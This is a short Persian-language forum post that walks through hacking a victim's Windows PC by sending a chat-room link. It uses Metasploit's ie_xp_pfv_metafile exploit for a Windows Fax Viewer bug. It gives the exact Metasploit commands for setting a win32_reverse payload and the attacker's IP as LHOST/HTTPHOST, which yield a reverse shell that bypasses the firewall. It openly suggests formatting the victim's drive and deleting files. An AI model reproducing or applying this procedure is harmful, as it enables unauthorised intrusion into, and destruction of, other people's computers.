هک بدون ارسال فایل (new)

[navidba]

در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد لینک دریافت Metasploit framework-2.5 پایین صفحه- آن توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من http://217.216.30.40/ باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن
بزنید set PAYLOAD win32_reverse و بعد ان
بزنید set HTTPHOST 217.216.30.40 و بعد آن
بزنید set LHOST 217.216.30.40
و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک http://217.216.30.40:8080 را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید
http://www.metasploit.com/tools/framework-2.5.exe